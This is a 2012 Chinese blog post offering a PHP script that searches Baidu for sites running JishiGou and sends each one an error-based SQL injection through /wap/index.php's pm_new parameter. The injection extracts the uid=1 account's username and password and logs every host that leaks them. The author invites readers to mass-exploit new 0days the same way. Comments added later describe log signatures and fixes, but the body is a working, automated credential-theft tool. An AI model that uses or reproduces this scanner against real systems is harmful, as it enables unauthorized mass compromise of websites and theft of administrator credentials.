贴出一个php的批量搜索吧

原理很简单,以后看着0day的时候都试着批量下吧,省事。。。。

<?php

// Driver loop: pages through Baidu results for a product banner string and
// passes every host name found to okbug(), which sends one SQL-injection
// probe to that host.
//
// Defender view: url.txt ends up holding every host that was probed, and
// shell.txt (written by okbug) every host whose response leaked data.
// Sites are selected purely by the banner text below appearing in a search
// index, so any indexed install carrying that banner is a candidate.
$keyword='Powered by JishiGou' ; // search phrase used to find candidate sites (the product's banner text)  

$timeout = 40; // passed to ReadBaiduList() as the fsockopen connect timeout, in seconds
$stratpage =1;  // first result page to fetch

$lastpage = 10000;// last result page to fetch

for ($i=$stratpage ; $i<=$lastpage ; $i++ ){  
$array=ReadBaiduList($keyword,$timeout,$i);// host names extracted from this Baidu result page
foreach ($array as $key=>$url ){// walk the hosts and probe each one
//echo $key;
// url.txt is re-read for every host and acts as the "already probed" list.
$url_list=file('url.txt');
if (in_array("$url\r\n",$url_list)){// host already recorded: skip it

echo " repeat\n";
}else{
// New host: record it first, then send the probe.
$fp = @fopen('url.txt', 'a');
@fwrite($fp, $url."\r\n");
@fclose($fp);
okbug($url);

}
   }
}
// Sends one HTTP GET to $host:80 and reports whether the response contains a
// MySQL "Duplicate entry ... for key" error.
//
// The request targets /wap/index.php with mod=pm and places a SQL subquery in
// the pm_new parameter. The subquery selects username and password from
// jishigou_members where uid=1 and wraps them in a count(*) / floor(rand(0)*2)
// / GROUP BY construct, a known error-based technique that makes MySQL echo
// the selected value inside a duplicate-key error message.
//
// Returns true (and appends "<host>   <50 bytes of the error text>" to
// shell.txt) when the error text is found, false otherwise.
//
// Defender view:
//  - Detection: access-log or WAF hits on /wap/index.php where pm_new contains
//    SQL keywords such as "information_schema", "floor(rand(0)*2)" or
//    "concat(0x27,0x7e"; one request per source/host pair, with "Connection: Close".
//  - The probe only succeeds if pm_new reaches a SQL statement unescaped AND
//    the raw database error is returned in the HTTP response. Binding or
//    casting pm_new server-side, and suppressing database error output, each
//    break it; the first is the actual fix.
//  - If such a request appears in logs and the response carried the error
//    text, treat the uid=1 credential as disclosed (presumably the first
//    account created, often an administrator; confirm per install).
function okbug($host){ // author's note, roughly: "capture the packet for this one"
$tmp = array(); // not used anywhere in this function
$data = '';
$fp = @fsockopen($host,80,$errno,$errstr,60); // 60 s connect timeout; errors suppressed by @
@fputs($fp,'GET /wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1 HTTP/1.1'."\r\nHost:$host\r\nConnection: Close\r\n\r\n");
// Read the whole response; the loop is skipped when the connect failed ($fp is false).
while ($fp && !feof($fp))
$data .= fread($fp, 102400);
@fclose($fp);
// Success indicator: the database error text is present in the HTTP response body.
if(preg_match('/Duplicate entry(.)+for key/i',$data)) {

$i = strpos($data,'Duplicate entry');

// Log the host plus the 50 bytes that follow "Duplicate entry " (15 chars + 1 space = offset 16).
$fp = @fopen('shell.txt', 'a');
@fwrite($fp, $host."   ".substr($data,$i+16,50)."\r\n");
@fclose($fp);
return         true;
}else{
return false;
}
}
// Fetches one Baidu result page for $keyword over plain HTTP and returns the
// host names of the result links found in it.
//
// $keyword  search phrase, URL-encoded into the wd parameter
// $timeout  fsockopen connect timeout in seconds
// $nowpage  1-based page number; converted below to the pn result offset
//
// Returns an array of host names (the part of each matched link before the
// first '/'); empty when nothing matched or the connection failed.
function ReadBaiduList($keyword,$timeout,$nowpage)
{
$tmp = array(); // receives the preg_match_all captures
//$data = '';
$nowpage = ($nowpage-1)*10; // page number -> result offset, 10 per page (the request itself asks for rn=100)
//echo $nowpage;
$fp = @fsockopen('www.baidu.com',80,$errno,$errstr,$timeout);
@fputs($fp,"GET /s?wd=".urlencode($keyword)."&pn=".$nowpage."&rn=100&usm=1 HTTP/1.1
Host: www.baidu.com
Connection: Close\r\n\r\n");
// $data has no initialiser here (the one above is commented out); it is first
// created by the .= below. The loop is skipped when the connect failed.
while ($fp && !feof($fp))
$data .= fread($fp, 1024);
//echo $date;
@fclose($fp);
// Capture group 1 is everything after http:// in anchors of the form
// })" href="http://..." target="_blank"
preg_match_all("/\}\)\" href\=\"http\:\/\/([^~]*?)\" target\=\"\_blank\"/i",$data,$tmp);
$num = count($tmp[1]);
//echo $num;
$array = array();
for($i = 0;$i < $num;$i++)
{
//echo $i;
// Keep only the host: the text before the first '/'.
$row = explode('/',$tmp[1][$i]);
// The capture already starts after "http://", so this replace normally changes nothing.
$array[] = str_replace('http://','',$row[0]);
}
return $array;
}
?>

posted on 2012-02-02 21:27  belie8  阅读(425)  评论(0)    收藏  举报
